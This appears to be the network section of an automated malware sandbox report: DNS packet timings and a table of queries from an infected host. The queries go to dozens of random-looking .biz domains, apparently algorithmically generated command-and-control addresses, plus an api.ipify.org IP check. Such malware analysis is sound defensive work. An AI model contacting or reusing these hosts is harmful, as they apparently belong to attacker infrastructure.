                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.483119965 CET53571291.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.405778885 CET5755853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.834528923 CET53575581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.835350037 CET5169853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.401971102 CET53516981.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.721597910 CET6397653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.861344099 CET53639761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.143609047 CET5050653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.284554005 CET53505061.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.285460949 CET6096753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.424880981 CET53609671.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.593286037 CET6166253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:57.174324036 CET53616621.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.701555967 CET6362453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.778242111 CET5074453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.843995094 CET53636241.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.334947109 CET53507441.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.401328087 CET5214953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.541441917 CET53521491.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.564575911 CET5583653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.129456997 CET53558361.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.806216002 CET6003253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.948649883 CET53600321.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.264108896 CET6301053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.826811075 CET53630101.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.214745998 CET5220353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.780375004 CET53522031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.019061089 CET5554453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.158997059 CET53555441.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.467215061 CET5606353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.611032963 CET53560631.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.724323034 CET4935453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.300951958 CET53493541.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.177401066 CET6435553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.318342924 CET53643551.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.583349943 CET5100853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.160248041 CET53510081.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.677089930 CET5411453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.822451115 CET53541141.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:14.161433935 CET6354853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:14.705224037 CET53635481.1.1.1192.168.2.10

                                                                                                                                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:10.656090021 CET192.168.2.101.1.1.10xb5e6Standard query (0)gxe0.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:24.230555058 CET192.168.2.101.1.1.10x8745Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:25.521167040 CET192.168.2.101.1.1.10x7599Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:27.842761040 CET192.168.2.101.1.1.10xece6Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:29.567281961 CET192.168.2.101.1.1.10xfe44Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:30.611069918 CET192.168.2.101.1.1.10xec2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:31.433948994 CET192.168.2.101.1.1.10x4f1dStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:32.636353970 CET192.168.2.101.1.1.10xc712Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.233315945 CET192.168.2.101.1.1.10x49aStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:35.396832943 CET192.168.2.101.1.1.10xf630Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:36.537811041 CET192.168.2.101.1.1.10x3989Standard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:37.384306908 CET192.168.2.101.1.1.10x774aStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:38.629266977 CET192.168.2.101.1.1.10x44faStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:40.975891113 CET192.168.2.101.1.1.10xd819Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:41.007483959 CET192.168.2.101.1.1.10xffb6Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:41.335412979 CET192.168.2.101.1.1.10x9815Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:45.153362989 CET192.168.2.101.1.1.10x3e6Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:47.041748047 CET192.168.2.101.1.1.10xbab6Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:47.189935923 CET192.168.2.101.1.1.10x265aStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.319410086 CET192.168.2.101.1.1.10xf061Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.479371071 CET192.168.2.101.1.1.10x8516Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:50.828154087 CET192.168.2.101.1.1.10x3bc9Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:12:51.957212925 CET192.168.2.101.1.1.10x3bc9Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:00.072077036 CET192.168.2.101.1.1.10xf8abStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:02.228634119 CET192.168.2.101.1.1.10xce65Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:04.663145065 CET192.168.2.101.1.1.10xe7deStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:06.396437883 CET192.168.2.101.1.1.10x74e0Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:07.874186039 CET192.168.2.101.1.1.10xbdf8Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:10.734965086 CET192.168.2.101.1.1.10x4bcbStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:10.876049042 CET192.168.2.101.1.1.10x43f0Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.249630928 CET192.168.2.101.1.1.10x3448Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.396846056 CET192.168.2.101.1.1.10x5bb7Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.542949915 CET192.168.2.101.1.1.10x49eStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:36.813688993 CET192.168.2.101.1.1.10x4736Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:54.679248095 CET192.168.2.101.1.1.10xfc83Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:22.407181025 CET192.168.2.101.1.1.10xe95bStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:25.580635071 CET192.168.2.101.1.1.10xa1fStandard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.538377047 CET192.168.2.101.1.1.10x5304Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.743410110 CET192.168.2.101.1.1.10xa9edStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.657852888 CET192.168.2.101.1.1.10x525bStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:34.654184103 CET192.168.2.101.1.1.10x525bStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.633970976 CET192.168.2.101.1.1.10x36a4Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.262001991 CET192.168.2.101.1.1.10x5d9Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.767441034 CET192.168.2.101.1.1.10xb174Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.613444090 CET192.168.2.101.1.1.10xdef6Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.225568056 CET192.168.2.101.1.1.10xfdf3Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.238214016 CET192.168.2.101.1.1.10xc01Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.570708036 CET192.168.2.101.1.1.10x5a95Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.056684017 CET192.168.2.101.1.1.10x9eddStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.997035980 CET192.168.2.101.1.1.10xf083Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.476106882 CET192.168.2.101.1.1.10xb015Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.194992065 CET192.168.2.101.1.1.10xdde1Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.343261957 CET192.168.2.101.1.1.10x6cfdStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.354481936 CET192.168.2.101.1.1.10xf951Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.135230064 CET192.168.2.101.1.1.10x45d0Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:53.515878916 CET192.168.2.101.1.1.10xc875Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:54.596368074 CET192.168.2.101.1.1.10xc5aaStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:55.327843904 CET192.168.2.101.1.1.10xf02dStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.328234911 CET192.168.2.101.1.1.10x3e96Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.579166889 CET192.168.2.101.1.1.10xadf8Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.508991003 CET192.168.2.101.1.1.10xea69Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.005544901 CET192.168.2.101.1.1.10x8705Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.404525042 CET192.168.2.101.1.1.10x91d6Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.824590921 CET192.168.2.101.1.1.10x441fStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.528589964 CET192.168.2.101.1.1.10x441fStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.060497999 CET192.168.2.101.1.1.10x9b40Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.211405993 CET192.168.2.101.1.1.10x873dStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.886529922 CET192.168.2.101.1.1.10x3794Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.267267942 CET192.168.2.101.1.1.10x30f4Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:06.421060085 CET192.168.2.101.1.1.10xa4beStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.217766047 CET192.168.2.101.1.1.10x48dStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:09.355587006 CET192.168.2.101.1.1.10xfe1cStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.084727049 CET192.168.2.101.1.1.10x36bbStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:11.252479076 CET192.168.2.101.1.1.10x7215Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.087428093 CET192.168.2.101.1.1.10x97a7Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:13.917392969 CET192.168.2.101.1.1.10xe6Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.649101973 CET192.168.2.101.1.1.10xb2c6Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:15.890495062 CET192.168.2.101.1.1.10x38f4Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:16.416507959 CET192.168.2.101.1.1.10x5a84Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:17.298671007 CET192.168.2.101.1.1.10x2fc7Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:18.149348974 CET192.168.2.101.1.1.10xf197Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:19.613038063 CET192.168.2.101.1.1.10xaeb5Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:20.127414942 CET192.168.2.101.1.1.10xb46Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:21.107275009 CET192.168.2.101.1.1.10xbd07Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.561860085 CET192.168.2.101.1.1.10x96b5Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:22.893950939 CET192.168.2.101.1.1.10x3352Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:24.949493885 CET192.168.2.101.1.1.10x8252Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.091794968 CET192.168.2.101.1.1.10xa6e3Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:25.690969944 CET192.168.2.101.1.1.10x69e9Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.773130894 CET192.168.2.101.1.1.10xb496Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:27.587307930 CET192.168.2.101.1.1.10x1137Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:28.245273113 CET192.168.2.101.1.1.10xd07aStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.393461943 CET192.168.2.101.1.1.10x48ebStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:30.674246073 CET192.168.2.101.1.1.10xb99eStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:32.931123972 CET192.168.2.101.1.1.10x6368Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:33.103188992 CET192.168.2.101.1.1.10xf9bbStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.736954927 CET192.168.2.101.1.1.10xb0dbStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:34.976042986 CET192.168.2.101.1.1.10x2446Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:36.908502102 CET192.168.2.101.1.1.10x2dfStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:37.110244036 CET192.168.2.101.1.1.10xa4e1Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.007806063 CET192.168.2.101.1.1.10x85dfStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:39.487617970 CET192.168.2.101.1.1.10x211eStandard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.123846054 CET192.168.2.101.1.1.10x7f53Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.209649086 CET192.168.2.101.1.1.10x9a9aStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:41.841301918 CET192.168.2.101.1.1.10x7f53Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:42.574917078 CET192.168.2.101.1.1.10xc21bStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:43.976589918 CET192.168.2.101.1.1.10x6293Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:44.243712902 CET192.168.2.101.1.1.10xf9bbStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.004483938 CET192.168.2.101.1.1.10xc6f8Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:46.718509912 CET192.168.2.101.1.1.10x1879Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.281405926 CET192.168.2.101.1.1.10xc1ffStandard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:48.830035925 CET192.168.2.101.1.1.10x1ff5Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.608628988 CET192.168.2.101.1.1.10xc141Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.543100119 CET192.168.2.101.1.1.10xf667Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.343319893 CET192.168.2.101.1.1.10xf24eStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.405778885 CET192.168.2.101.1.1.10x40fdStandard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.835350037 CET192.168.2.101.1.1.10x1f08Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.721597910 CET192.168.2.101.1.1.10xadaStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.143609047 CET192.168.2.101.1.1.10x29feStandard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.285460949 CET192.168.2.101.1.1.10x517cStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:56.593286037 CET192.168.2.101.1.1.10x5efbStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.701555967 CET192.168.2.101.1.1.10x451dStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.778242111 CET192.168.2.101.1.1.10xb8ebStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.401328087 CET192.168.2.101.1.1.10x25d9Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.564575911 CET192.168.2.101.1.1.10xb7abStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.806216002 CET192.168.2.101.1.1.10x5cbeStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.264108896 CET192.168.2.101.1.1.10x46a1Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.214745998 CET192.168.2.101.1.1.10xe917Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.019061089 CET192.168.2.101.1.1.10x2a1fStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.467215061 CET192.168.2.101.1.1.10x448dStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.724323034 CET192.168.2.101.1.1.10x6d4bStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.177401066 CET192.168.2.101.1.1.10x7826Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.583349943 CET192.168.2.101.1.1.10x57adStandard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:12.677089930 CET192.168.2.101.1.1.10x3a3cStandard query (0)rynmcq.bizA (IP address)IN (0x0001)false
